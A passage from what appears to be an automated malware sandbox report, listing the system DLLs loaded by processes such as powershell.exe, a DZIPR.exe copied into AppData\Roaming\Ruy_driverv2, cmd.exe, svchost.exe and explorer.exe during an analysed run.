Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
